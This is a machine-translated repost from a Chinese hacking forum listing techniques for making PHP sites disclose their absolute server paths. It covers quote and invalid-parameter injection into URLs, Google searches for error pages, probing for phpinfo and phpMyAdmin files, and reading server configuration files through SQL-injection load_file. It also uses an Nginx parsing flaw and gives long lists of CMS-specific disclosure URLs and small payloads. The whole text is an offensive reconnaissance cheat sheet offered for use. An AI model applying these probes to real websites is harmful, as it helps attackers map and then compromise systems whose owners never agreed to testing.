PHP Explosion Absolute Path method

From: http://www.cnhonkerarmy.com/thread-139414-1-1.html

1. Single quotation mark explosion path Description:
Add single quotes directly behind the URL, requiring that the single quotation mark not be filtered (Gpc=off) and that the server return the error message by default.
www.xxxxx.com/news.php?id=149′

2, error parameter value explosion path
Description
Change the value of the parameter you want to submit to an error value, such as-1. -99999 single quotes to be filtered may wish to try.
Www.xxxxx.com/researcharchive.php?id=-1

3, Google explosion path
Description
Combining keywords and site syntax to search for page snapshots of error pages, common keywords are warning and fatal error. Note that if the target site is a level two domain name, the site is connected to its corresponding top-level domain, so that the information to get much more.
SITE:XXX.EDU.TW Warning
Site:xxx.com.tw "Fatal error"


4. test file explosion path
Description
Many web sites have test files in their root directory, and scripting code is usually phpinfo ().
www.xxxxx.com/test.php
www.xxxxx.com/ceshi.php
www.xxxxx.com/info.php
www.xxxxx.com/phpinfo.php
www.xxxxx.com/php_info.php
www.xxxxx.com/1.php

5, phpMyAdmin explosion path
Description
Once you find the phpMyAdmin Administration page, and then access certain files in the directory, you are likely to burst the physical path. As for the phpMyAdmin address can be used wwwscan such tools to sweep, you can also choose Google. PS: Some BT websites will be written as phpMyAdmin.
1./phpmyadmin/libraries/lect_lang.lib.php
2./phpmyadmin/index.php?lang[]=1
3./phpmyadmin/phpinfo.php
4. Load_file ()
5./phpmyadmin/themes/darkblue_orange/layout.inc.php
6./phpmyadmin/libraries/select_lang.lib.php
7./phpmyadmin/libraries/lect_lang.lib.php
8./phpmyadmin/libraries/mcrypt.lib.php

6, the configuration file to find the path

Description
If the injection point has file Read permission, you can manually load_file or tools to read the configuration file, and then find the path information (generally at the end of the file). Each platform under the Web server and PHP configuration file default path can be online search, here are listed several common.

Windows:
C:\windows\php.ini PHP configuration file
C:\windows\system32\inetsrv\MetaBase.xml IIS Virtual Host configuration file

Linux:
/etc/php.ini PHP configuration file
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf Apache configuration file
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-vhosts.conf Virtual Directory configuration file

7, Nginx file type Error resolution explosion path
Description
This was accidentally discovered yesterday, and of course requires the Web server to be nginx, and there is a file type resolution vulnerability. Sometimes add/x.php to the image address, the image will not only be used as PHP file execution, but also the possibility of a physical path.
/x.php

8. Other
Dedecms
/member/templets/menulit.php
plus/paycenter/alipay/return_url.php
plus/paycenter/cbpayment/autoreceive.php
paycenter/nps/config_pay_nps.php
plus/task/dede-maketimehtml.php
plus/task/dede-optimize-table.php
plus/task/dede-upcache.php

Wp
wp-admin/includes/file.php
wp-content/themes/baiaogu-seo/footer.php

Ecshop Mall System Storm Path Vulnerability file
/api/cron.php
/wap/goods.php
/temp/compiled/ur_here.lbi.php
/temp/compiled/pages.lbi.php
/temp/compiled/user_transaction.dwt.php
/temp/compiled/history.lbi.php
/temp/compiled/page_footer.lbi.php
/temp/compiled/goods.dwt.php
/temp/compiled/user_clips.dwt.php
/temp/compiled/goods_article.lbi.php
/temp/compiled/comments_list.lbi.php
/temp/compiled/recommend_promotion.lbi.php
/temp/compiled/search.dwt.php
/temp/compiled/category_tree.lbi.php
/temp/compiled/user_passport.dwt.php
/temp/compiled/promotion_info.lbi.php
/temp/compiled/user_menu.lbi.php
/temp/compiled/message.dwt.php
/temp/compiled/admin/pagefooter.htm.php
/temp/compiled/admin/page.htm.php
/temp/compiled/admin/start.htm.php
/temp/compiled/admin/goods_search.htm.php
/temp/compiled/admin/index.htm.php
/temp/compiled/admin/order_list.htm.php
/temp/compiled/admin/menu.htm.php
/temp/compiled/admin/login.htm.php
/temp/compiled/admin/message.htm.php
/temp/compiled/admin/goods_list.htm.php
/temp/compiled/admin/pageheader.htm.php
/temp/compiled/admin/top.htm.php
/temp/compiled/top10.lbi.php
/temp/compiled/member_info.lbi.php
/temp/compiled/bought_goods.lbi.php
/temp/compiled/goods_related.lbi.php
/temp/compiled/page_header.lbi.php
/temp/compiled/goods_script.html.php
/temp/compiled/index.dwt.php
/temp/compiled/goods_fittings.lbi.php
/temp/compiled/myship.dwt.php
/temp/compiled/brands.lbi.php
/temp/compiled/help.lbi.php
/temp/compiled/goods_gallery.lbi.php
/temp/compiled/comments.lbi.php
/temp/compiled/myship.lbi.php
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/includes/modules/cron/auto_manage.php
/includes/modules/cron/ipdel.php

Ucenter explosion Path
ucenter\control\admin\db.php

Dzbbs
Manyou/admincp.php?my_suffix=%0a%0dtoby57

Z-blog
admin/fckeditor/editor/dialog/fck%5fspellerpages/spellerpages/server%2dscripts/spellchecker.php

php168 explosion Path
Admin/inc/hack/count.php?job=list
Admin/inc/hack/search.php?job=getcode
Admin/inc/ajax/bencandy.php?job=do
Cache/mysqltime.txt

Phpcms2008-sp4
Registered users access after landing
Phpcms/corpandresize/process.php?pic=.. /images/logo.gif

Bo-blog
Poc:
/go.php/<[evil Code]
Cmseasy Explosion Web site Path Vulnerability
The vulnerability appears in the menu_top.php file.
lib/mods/celive/menu_top.php
/lib/default/ballot_act.php
lib/default/special_act.php

Wordpress:
wp-includes/registration-functions.php